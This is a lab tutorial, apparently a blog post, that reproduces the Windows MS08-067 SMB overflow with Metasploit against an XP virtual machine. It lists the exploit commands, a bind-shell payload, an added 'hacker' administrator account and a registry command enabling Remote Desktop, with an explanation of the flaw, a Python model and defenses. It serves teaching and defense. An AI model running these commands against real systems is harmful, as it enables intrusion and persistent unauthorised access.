Abstract: This article introduces the MS08-067 remote code execution vulnerability (CVE-2008-4250), reproduces it with Metasploit, and describes how to defend against it.

This article is shared from the Huawei Cloud community post “Windows Vulnerability Exploitation: MS08-067 Remote Code Execution Vulnerability Reproduction and Defense in Depth” by Eastmount.

1. Vulnerability description

MS08-067 is known as the “Windows Server service RPC request buffer overflow vulnerability”. An attacker sends a specially crafted Remote Procedure Call (RPC) request over SMB (TCP port 445, which the victim has open by default) and triggers a stack buffer overflow in the Server service that can be exploited for remote code execution.

The vulnerability lets an unauthenticated attacker run arbitrary code on an affected system just by sending the RPC request; no user interaction is needed, which is why it was usable by worms (the Conficker worm spread through it). Microsoft rated it critical on the following older versions of Windows (Windows Vista and Server 2008 also received the patch, but there exploitation requires authentication, so the rating was lower):

  • Windows 2000

  • Windows XP

  • Windows Server 2003

Principle of the vulnerability:

The vulnerability is triggered when the NetPathCanonicalize function of the Server service is called over the MSRPC-over-SMB channel. NetPathCanonicalize calls NetpwPathCanonicalize (in netapi32.dll) to canonicalize the supplied path, and a stack buffer overflow occurs in that path handling. The result can be used for remote code execution. In a later section I analyze the function's CFG and the cause of the vulnerability.

This article draws on many experts' articles; my thanks to them. The experiment is based on my own practice and experience; if there are mistakes or omissions, please point them out.

2. Environment setup

1. Environment preparation

  • Victim VM: Windows XP SP1 image

  • Attacker VM: Kali Linux

Step 1: Install Windows XP SP1 and Kali in the virtual machine software.

Step 2: Make sure the two virtual machines can reach each other.

  • Kali: 192.168.44.136

  • Windows XP: 192.168.44.135

Step 3: Start Windows XP and make sure port 445 is listening. As shown in the figure below, run netstat -an in the Windows XP command prompt and look for a TCP socket in the LISTENING state on port 445 (0.0.0.0:445).

Step 4: Disable the firewall on Windows XP.

With these preparations done, we reproduce the vulnerability from Kali.

2. Port basics

Here the author adds some basics about ports, which helps with penetration testing.

(1) Port functions

As we know, a host with one IP address can provide many services, such as web, FTP and SMTP, all on that single address. How does the host tell the services apart? Not by IP address alone, since the relation between an IP address and its services is one-to-many; the combination of IP address and port number identifies each service.

Note that the two ends of a connection do not use the same port. When your computer accesses a WWW server as a client, the server communicates on port 80, while your computer may use an ephemeral port such as 3456. As shown below:

(2) Classification of ports

Port numbers range from 0 to 65535. The well-known ports are 0 to 1023; they are assigned to standard services and should not be used by other programs. For example, port 21 is assigned to FTP, port 25 to SMTP mail transfer, port 80 to HTTP, port 135 to the RPC endpoint mapper, and so on.

The dynamic ports are 1024 to 65535. They are not tied to a single service: whenever a running program asks for network access, the system can allocate one of these ports to it, and the port is released when the process exits (the first such request may receive port 1024, the next 1025, and so on). If two programs try to bind the same port, the second one fails; this is a port conflict.

Dynamic ports are also the ones Trojans tend to use: the Glacier Trojan's default connection port is 7626, WAY 2.4 uses 8011, Netspy 3.0 uses 7306, and the YAI virus uses 1024.

(3) Common ports

(4) What can an attacker learn through a port?

  • Information gathering

  • Target discovery

  • Service identification

  • OS identification

  • Role analysis

(5) port 445

Childe Xie's article “Ports 135, 137, 138, 139 and 445” describes these ports: they are all related to file and printer sharing, and they have had serious vulnerabilities again and again. For example, EternalBlue (MS17-010), which WannaCry used to spread worldwide in 2017, attacks port 445.

Port 445 carries the file and printer sharing service of the Windows Server Message Block (SMB) protocol family. It is a double-edged sword: it makes shared folders and printers on the LAN easy to reach, but it also gives attackers a way in. Through this port an attacker can silently access shared drives, and one who gains control of the machine can even format them.

In short, leaving ports 139 and 445 open on a public server is very dangerous. If the Guest account is enabled without a password, files can be stolen over the Internet, and if that account has write permission they can be tampered with as well. These ports should not be reachable from outside; running a file server directly over the Internet is asking for trouble, so make sure ports 139 and 445 are blocked. The same applies to client machines that are permanently connected to the Internet over ADSL.

3. Reproducing the vulnerability with Metasploit

  • Attacker: Kali, 192.168.44.136

  • Victim: Windows XP, 192.168.44.135

Step 1: Use Nmap to scan the port and confirm whether the vulnerability exists.

nmap -n -p 445 --script smb-vuln-ms08-067 192.168.44.135 --open

Nmap's scan scripts live in /usr/share/nmap/scripts/, as the figure shows. The script reports VULNERABLE, which means MS08-067 is present and can be exploited.

Alternatively, run nmap -sV -Pn 192.168.44.135 to see the target's open ports. Ports 135, 139, 445, 1025 and 5000 are open, and the service fingerprints identify the host as Windows XP. When an attacker sees port 445 open on XP or 2003, MS08-067 is the first thing that comes to mind.

nmap -sV -Pn 192.168.44.135
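When the scan from step 1 covers more than one host, it is easier to let nmap write XML (-oX) and triage it than to read the terminal output. The following Python script is an added example, not part of the original post: it reads only the State: line of each smb-vuln-ms08-067 script result, because a plain search for the word VULNERABLE also matches NOT VULNERABLE. The embedded XML is constructed to look like nmap's output for three hosts (the victim at 192.168.44.135 plus two invented neighbours); the hosts, verdicts and wording are assumptions, not a real capture.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX - -n -p 445 --script smb-vuln-ms08-067 192.168.44.0/24`
# output, trimmed to the elements used below (not a real capture). The script output
# follows the layout of nmap's vulns library, where a "State:" line carries the verdict.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -oX - -n -p 445 --script smb-vuln-ms08-067 192.168.44.0/24">
  <host><status state="up"/><address addr="192.168.44.135" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/>
      <script id="smb-vuln-ms08-067" output="&#10;  VULNERABLE:&#10;  Microsoft Windows system vulnerable to remote code execution (MS08-067)&#10;    State: VULNERABLE&#10;    IDs:  CVE:CVE-2008-4250"/>
    </port></ports></host>
  <host><status state="up"/><address addr="192.168.44.140" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/>
      <script id="smb-vuln-ms08-067" output="&#10;  Microsoft Windows system vulnerable to remote code execution (MS08-067)&#10;    State: NOT VULNERABLE"/>
    </port></ports></host>
  <host><status state="up"/><address addr="192.168.44.1" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports></host>
</nmaprun>
"""

STATE_RE = re.compile(r"^\s*State:\s*(.+?)\s*$", re.M)
SCRIPT_ID = "smb-vuln-ms08-067"


def ms08_067_results(xml_text: str) -> dict:
    """Map every scanned host address to the verdict of smb-vuln-ms08-067.

    Values: 'VULNERABLE', 'LIKELY VULNERABLE', 'NOT VULNERABLE', 'UNKNOWN'
    (script ran but printed no State line) or None (no script output at all:
    port closed or filtered, SMB down, or the script was not run).
    """
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:                      # fall back to whatever address exists
            addr_el = host.find("address")
        addr = addr_el.get("addr")
        results[addr] = None
        for script in host.iter("script"):
            if script.get("id") == SCRIPT_ID:
                m = STATE_RE.search(script.get("output", ""))
                results[addr] = m.group(1) if m else "UNKNOWN"
    return results


def vulnerable_hosts(xml_text: str) -> list:
    """Addresses nmap reports as VULNERABLE, sorted: the ones worth pointing
    Metasploit at, instead of firing the exploit at every host with 445 open."""
    return sorted(a for a, s in ms08_067_results(xml_text).items() if s == "VULNERABLE")


if __name__ == "__main__":
    for addr, state in ms08_067_results(SAMPLE_XML).items():
        print(f"{addr:16} {state}")
    print("exploit candidates:", vulnerable_hosts(SAMPLE_XML))
```

On the sample, the victim is the only candidate; 192.168.44.140 answers on 445 but is reported NOT VULNERABLE, and 192.168.44.1 produced no script output because the port is filtered. A None entry is worth a second look (firewall, SMB disabled, or a host that simply was not scanned with the script) rather than being treated as safe.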

Step 2: Open msfconsole and use search to find the exploit module. Enter msfconsole in a terminal to start the Metasploit console, then search for the MS08-067 module.

msfconsole
search ms08-067

Step 3: Select the exploit module and view its options. The use command selects the module. The target option defaults to automatic targeting; for a precise match, show targets lists all targets so you can set the one that fits the victim.

use exploit/windows/smb/ms08_067_netapi
show options
show targets

Step 4: Set the attacker and victim information.

set payload generic/shell_bind_tcp
set RHOST 192.168.44.135
set RPORT 445
set LHOST 192.168.44.136
set target 0
show options

set payload chooses the attack payload (here a bind shell that listens on the victim), RHOST and RPORT point at the victim's SMB port, LHOST is the attacker's address (only reverse payloads actually need it), and target 0 is automatic targeting.

Step 5: Run exploit to obtain the shell. We now have a command shell on the Windows XP system; running ipconfig in it shows the target address 192.168.44.135.

exploit
sessions -i 1
ipconfig
cd

The session is a plain cmd.exe shell, so Unix commands such as pwd are not available; cd with no argument prints the current directory.

Note: For Windows XP SP1 the stock module may need changes; a modified module, ms08_067_netapi_ser2003_zh.rb, is described in the following article:

MS08-067 remote code execution vulnerability reproduction – Feizianquan

Step 6: Create a folder and a file on the target host.

cd ..
mkdir hacker
cd hacker
echo eastmount>test.txt

The result is as follows:

Step 7: Add an administrator account on the target XP host. The shell obtained through MS08-067 already runs as SYSTEM, because the Server service runs inside svchost.exe under the LocalSystem account, so this step is about keeping access rather than raising privileges.

net user hacker 123456 /add
net localgroup administrators hacker /add

Common Windows net user commands:

  • net user abcd 1234 /add

Create the account abcd with password 1234; a new account is a member of the Users group by default

  • net user abcd /del

Delete the user abcd

  • net user abcd /active:no

Disable the user abcd

  • net user abcd /active:yes

Enable the user abcd

  • net user abcd

Show information about the user abcd

  • net localgroup administrators abcd /add

Give the account abcd administrator privileges

The attacked host now has a new administrator named hacker, as shown in the figure below:

Step 8: Enable Remote Desktop (port 3389) and operate the host remotely.

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

Before this command, netstat -an on the target shows that port 3389 is not listening.

Run the command above in the shell to enable remote connections: setting fDenyTSConnections to 0 turns Remote Desktop on (this works on XP Professional, which includes the Remote Desktop host; XP Home does not).

Then, from Kali, run rdesktop 192.168.44.135 to connect to the target and log in with the hacker account we created.

Enter the username hacker and the password 123456 and press Enter; click OK in the dialog that appears.

Finally, remove the hacker account again (net user hacker /del) to clean up. That concludes the experiment.

4. Common errors and vulnerability analysis

1. Common errors

When running exploit we sometimes get errors such as “Exploit completed, but no session was created” or “ConnectionRefused: The connection was refused by the remote host”. Check the following:

  • Disable the firewall on Windows XP

  • The exploit is unstable; try a few more times

Sometimes XP shows a “Generic Host Process for Win32 Services” error. This is svchost.exe crashing because of the overflow (the Server service runs inside it).

Finally, the author solved the payload problem: when choosing a payload from show payloads, set payload generic/shell_reverse_tcp produced an error, and switching to set payload generic/shell_bind_tcp worked.

  • Reverse shell failed: set payload generic/shell_reverse_tcp

  • Bind shell succeeded: set payload generic/shell_bind_tcp

For a reverse payload, LHOST must be the attacker's address (192.168.44.136) and the listener port must be reachable from the victim; a bind payload listens on the victim instead, so only the victim's firewall matters. If it still fails, try another XP or 2003 system. Good luck!

2. Cause of the vulnerability

To understand the principle of this vulnerability, the following three articles are recommended; a deeper analysis of the vulnerable code is left for a later article.

www.cnblogs.com/justforfun1…

Bbs.pediy.com/thread-2512…

www.freebuf.com/vuls/203881…

The MS08-067 vulnerability is triggered when the NetPathCanonicalize function of the Server service is called over the MSRPC-over-SMB channel. To canonicalize the path of a remote access, NetPathCanonicalize calls NetpwPathCanonicalize, and a stack buffer overflow in that function's path handling is what allows remote code execution.

Path canonicalization converts every / in the path string to \ and removes the relative components .\ and ..\, for example:

/*/./*     =>  \*\*
\*\*\..\*  =>  \*\*

When it handles a ..\ component, the server walks backwards through the path string to find the previous separator, and the check on how far back this walk may go is flawed. With a carefully crafted path, the copy that removes ..\ writes the rest of the path string to an address before (below) the start of the path buffer, which lets the attacker overwrite the function's return address and execute arbitrary code.

Open C:\Windows\System32\netapi32.dll in IDA Pro, locate NetpwPathCanonicalize and double-click it. Its control-flow graph (CFG) shows that the function does not process the input path itself but calls the subordinate function CanonicalizePathName, which canonicalizes the path string into a pre-allocated output buffer. That copy into the output buffer is where the buffer overflow occurs.

5. Summary

In this experiment we reproduced the MS08-067 remote code execution vulnerability, covering discovery, verification and exploitation, and used Metasploit to obtain a shell; I hope it helps. How to defend against it? On one hand, close the relevant ports (139/445) where they are not needed, run anti-virus software and install the patch (KB958644); on the other hand, monitor traffic at the firewall for packets carrying malicious path names of the form \**\..\..\*; the most reliable way to detect such paths is a PCRE regular-expression match.
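To make the cause and the defense concrete, here is an added example (mine, not the original post's code and not the actual netapi32 logic) covering both the ..\ analysis above and the regex suggestion in the summary: a simplified ..\ collapse that scans backwards for the previous separator without being bounded by the start of its buffer, the same routine with the bound the patch is modelled as adding, and a regex of the summary's shape beside a depth check that is tighter. The frame layout, the RET! marker, the sample paths and the exact rejection behaviour of the fix are all constructed assumptions; real paths are UTF-16 and the real function is more involved.

```python
import re

# Added example, not netapi32 code: a simplified model of the flaw described
# above. A bytearray stands in for the stack frame (low index = low address).
# Constructed layout: a 4-byte "saved return address" marker, then the
# NUL-terminated path buffer right above it. Only the scan-and-copy is modelled.
FRAME_SIZE = 64
RET_OFF = 0            # b"RET!" marks the saved return address
BUF_OFF = 4            # the path buffer starts here
SEP = ord("\\")


def make_frame(path: str) -> bytearray:
    """Lay out the constructed frame: marker below, NUL-terminated path above."""
    data = path.encode("ascii")
    if len(data) >= FRAME_SIZE - BUF_OFF:
        raise ValueError("constructed frame too small for this path")
    frame = bytearray(FRAME_SIZE)
    frame[RET_OFF:RET_OFF + 4] = b"RET!"
    frame[BUF_OFF:BUF_OFF + len(data)] = data
    return frame


def canonical_path(frame: bytearray, start: int) -> str:
    """Read back the NUL-terminated path that begins at `start`."""
    return bytes(frame[start:frame.index(0, start)]).decode("ascii")


def _is_dotdot(frame: bytearray, i: int, end: int) -> bool:
    """True when a '\\..' component starts at i (followed by '\\' or the NUL)."""
    return frame[i:i + 3] == b"\\.." and (i + 3 == end or frame[i + 3] == SEP)


def _collapse(frame: bytearray, start: int, bounded: bool) -> int:
    """Remove every '\\..' in place; return where the path now begins.

    Each '\\..' is resolved by scanning backwards for the previous separator
    and copying the rest of the path there. bounded=False is the modelled
    MS08-067 defect: the scan is not limited by `start`, so a path that opens
    with '\\..\\' walks below its buffer and the copy lands on the return
    address (it halts at index 0 only because the modelled memory ends there).
    bounded=True is the modelled fix: a '..' with nothing above it is rejected.
    """
    i, end = start, frame.index(0, start)      # end = NUL terminator
    floor = start if bounded else 0
    while i < end:
        if not _is_dotdot(frame, i, end):
            i += 1
            continue
        j = i - 1
        while j >= floor and frame[j] != SEP:
            j -= 1
        if j < floor:
            if bounded:
                raise ValueError("'..' would climb above the path root")
            j = 0                                # ran off the modelled memory
        tail = bytes(frame[i + 3:end + 1])       # rest of the path plus NUL
        frame[j:j + len(tail)] = tail
        end, start, i = j + len(tail) - 1, min(start, j), j
    return start


def canonicalize_vulnerable(frame: bytearray, start: int) -> int:
    return _collapse(frame, start, bounded=False)


def canonicalize_fixed(frame: bytearray, start: int) -> int:
    return _collapse(frame, start, bounded=True)


def return_address_after(path: str, fixed: bool) -> bytes:
    """Canonicalize `path` in a fresh frame and return the marker bytes;
    anything but b'RET!' means the copy escaped the path buffer."""
    frame = make_frame(path)
    try:
        (canonicalize_fixed if fixed else canonicalize_vulnerable)(frame, BUF_OFF)
    except ValueError:
        pass                                     # the modelled fix rejected it
    return bytes(frame[RET_OFF:RET_OFF + 4])


def rejected_by_fix(path: str) -> bool:
    try:
        canonicalize_fixed(make_frame(path), BUF_OFF)
    except ValueError:
        return True
    return False


# Defensive side. The summary suggests a PCRE match for the '\\..\\..\\' shape;
# DOTDOT_RUN is that pattern. climbs_above_root is the tighter rule: it fires
# only when the '..' components climb above the root, exactly the case the
# unbounded scan mishandles, and it also catches a lone '\\..' at the root.
DOTDOT_RUN = re.compile(r"(?:\\\.\.){2,}(?:\\|$)")


def matches_page_pattern(path: str) -> bool:
    return DOTDOT_RUN.search(path) is not None


def climbs_above_root(path: str) -> bool:
    depth = 0
    for seg in path.replace("/", "\\").split("\\"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False
```

Calling return_address_after("\\..\\EVIL", fixed=False) returns b"\\EVI": the vulnerable routine has copied the tail of the path over the return-address marker, while the patched routine rejects the same path and leaves b"RET!" intact; a normal path such as \srv\share\..\x canonicalizes to \srv\x under both. The comparison of the two detectors is the caveat for the firewall rule: a regex of the summary's shape flags the legitimate path \a\b\..\..\c and misses \..\EVIL, whereas climbs_above_root gets both right.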

Complete commands for this experiment:

# Kali: scan
nmap -n -p 445 --script smb-vuln-ms08-067 192.168.44.135 --open
nmap -sV -Pn 192.168.44.135
# Kali: Metasploit
msfconsole
search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options
show targets
set RHOST 192.168.44.135
set RPORT 445
set payload generic/shell_bind_tcp
set LHOST 192.168.44.136
set target 0
show options
exploit
sessions -i 1
# target shell: check the host
ipconfig
cd
systeminfo
# target shell: file operations
cd ..
mkdir hacker
dir
cd hacker
echo eastmount>test.txt
# target shell: add an administrator
net user hacker 123456 /add
net localgroup administrators hacker /add
# target shell: enable Remote Desktop
echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat
netstat -an
# Kali: connect
rdesktop 192.168.44.135
